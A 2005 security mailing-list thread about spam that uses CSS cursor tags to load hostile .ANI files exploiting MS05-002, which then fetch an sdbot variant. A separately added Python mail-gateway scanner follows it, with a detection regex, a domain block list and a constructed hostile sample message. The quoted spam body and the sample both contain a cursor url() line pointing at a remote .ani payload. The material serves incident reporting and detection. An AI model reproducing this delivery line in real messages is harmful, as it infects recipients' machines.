RE: ANI Exploits in Spam

From: Britton, Jeff B. (JBBritton_at_LMUS.LeggMason.com)
Date: 03/29/05

    To: "'James C. Slora, Jr.'" <james.slora@phra.com>, incidents@securityfocus.com
    Date: Tue, 29 Mar 2005 10:59:38 -0500

    I notice the same trend. ANI files seem to be coming from:
    (some name).sitemynet.com\*.ani

    If possible, I would block sitemynet.com (212.101.97.230).

    -----Original Message-----
    From: James C. Slora, Jr. [mailto:james.slora@phra.com]
    Sent: Monday, March 28, 2005 6:42 PM
    To: incidents@securityfocus.com
    Subject: ANI Exploits in Spam

    FYI -

    Today we received dozens of spam messages with cursor style tags that
    point to hostile .ANI files exploiting the cursor and icon vulnerability
    from MS05-002.
     
    The ANI files in my spam get downloaded from an apparently compromised
    set of virtual servers sharing a box. On a vulnerable system, the ANI
    will download and execute a variant of sdbot named hi.exe from a server
    registered to a different ISP.

    Older versions of Outlook will download the hostile ANI if the message
    gets previewed in HTML.

    VirusTotal showed about half the vendors detected the hostile ANI file
    under various names, and only a few detected the packed sdbot in hi.exe.

    I do have samples if anyone is interested.

    There are many different message subjects and message bodies following
    similar forms. The ANI files also have a different name on each virtual
    server.

    Typical hostile spam body is below. I removed the < from the style tags,
    and the specific site from the url.

    Keep your motor running dude as you're into a surprise. I;mcoming home
    tonight and taking you out. happy birthday love Jess

    style>* {CURSOR: url("http://SiteStillLive-Removed/m89.ani")}/style>

    IMPORTANT: The security of electronic mail sent through the Internet
    is not guaranteed. Legg Mason therefore recommends that you do not
    send confidential information to us via electronic mail, including social
    security numbers, account numbers, and personal identification numbers.

    Delivery, and timely delivery, of electronic mail is also not
    guaranteed. Legg Mason therefore recommends that you do not send time-sensitive
    or action-oriented messages to us via electronic mail, including
    authorization to "buy" or "sell" a security or instructions to conduct any
    other financial transaction. Such requests, orders or instructions will
    not be processed until Legg Mason can confirm your instructions or
    obtain appropriate written documentation where necessary.
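Added example (not part of either message in this thread): a small mail-gateway check, written here for illustration, that flags the delivery pattern both posters describe: an HTML message body carrying a CSS `cursor:` declaration whose `url()` points at a `.ani` file, which Outlook would fetch on preview. It extracts the cursor URLs, compares the host against a block list seeded with the sitemynet.com domain named above, and returns a verdict. The sample message below is constructed for the example; the `somename` host label and the function names are assumptions, not values from the thread.

```python
import re
from email import message_from_string
from urllib.parse import urlparse

# CSS cursor declaration whose url() target ends in .ani, e.g.
#   <style>* {CURSOR: url("http://host/m89.ani")}</style>
# Case-insensitive; quotes around the URL are optional in CSS.
CURSOR_ANI_RE = re.compile(
    r"cursor\s*:\s*url\(\s*['\"]?([^'\")\s]+\.ani)['\"]?\s*\)",
    re.IGNORECASE,
)

# Domain(s) named in the thread as serving the hostile cursors.
# Illustrative block list; extend from your own mail logs.
BLOCKED_HOST_SUFFIXES = ("sitemynet.com",)


def find_ani_cursor_urls(html: str) -> list:
    """Return every .ani URL referenced from a cursor: declaration."""
    return CURSOR_ANI_RE.findall(html)


def host_is_blocked(url: str) -> bool:
    """True if the URL's host is, or is under, a block-listed domain."""
    host = (urlparse(url).hostname or "").lower()
    return any(host == s or host.endswith("." + s) for s in BLOCKED_HOST_SUFFIXES)


def scan_message(raw_message: str) -> dict:
    """Walk every text/html part of an RFC 822 message and report cursor .ani references."""
    msg = message_from_string(raw_message)
    ani_urls = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        payload = part.get_payload(decode=True) or b""
        charset = part.get_content_charset() or "utf-8"
        ani_urls.extend(find_ani_cursor_urls(payload.decode(charset, errors="replace")))

    blocked = [u for u in ani_urls if host_is_blocked(u)]
    # Any remote .ani cursor in mail is unusual enough to quarantine; a
    # block-listed host makes it a confirmed match for this campaign.
    if blocked:
        verdict = "quarantine:known-host"
    elif ani_urls:
        verdict = "quarantine:ani-cursor"
    else:
        verdict = "clean"
    return {"ani_urls": ani_urls, "blocked": blocked, "verdict": verdict}


# Constructed sample modelled on the spam body quoted in the thread
# (host label "somename" is made up for the example).
SAMPLE_HOSTILE = """From: sender@example.test
To: victim@example.test
Subject: happy birthday
MIME-Version: 1.0
Content-Type: text/html; charset="us-ascii"

Keep your motor running dude as you're into a surprise.
<style>* {CURSOR: url("http://somename.sitemynet.com/m89.ani")}</style>
"""

# Constructed benign message for comparison.
SAMPLE_CLEAN = """From: sender@example.test
To: victim@example.test
Subject: lunch
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"

See you at noon.
"""

if __name__ == "__main__":
    for name, sample in (("hostile", SAMPLE_HOSTILE), ("clean", SAMPLE_CLEAN)):
        print(name, scan_message(sample))
```

The regex deliberately keys on the `cursor:` property rather than on `.ani` alone, so ordinary links to animated cursors in signatures are not swept up; pairing it with the host block list gives a second, independent signal for the specific campaign in this thread.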
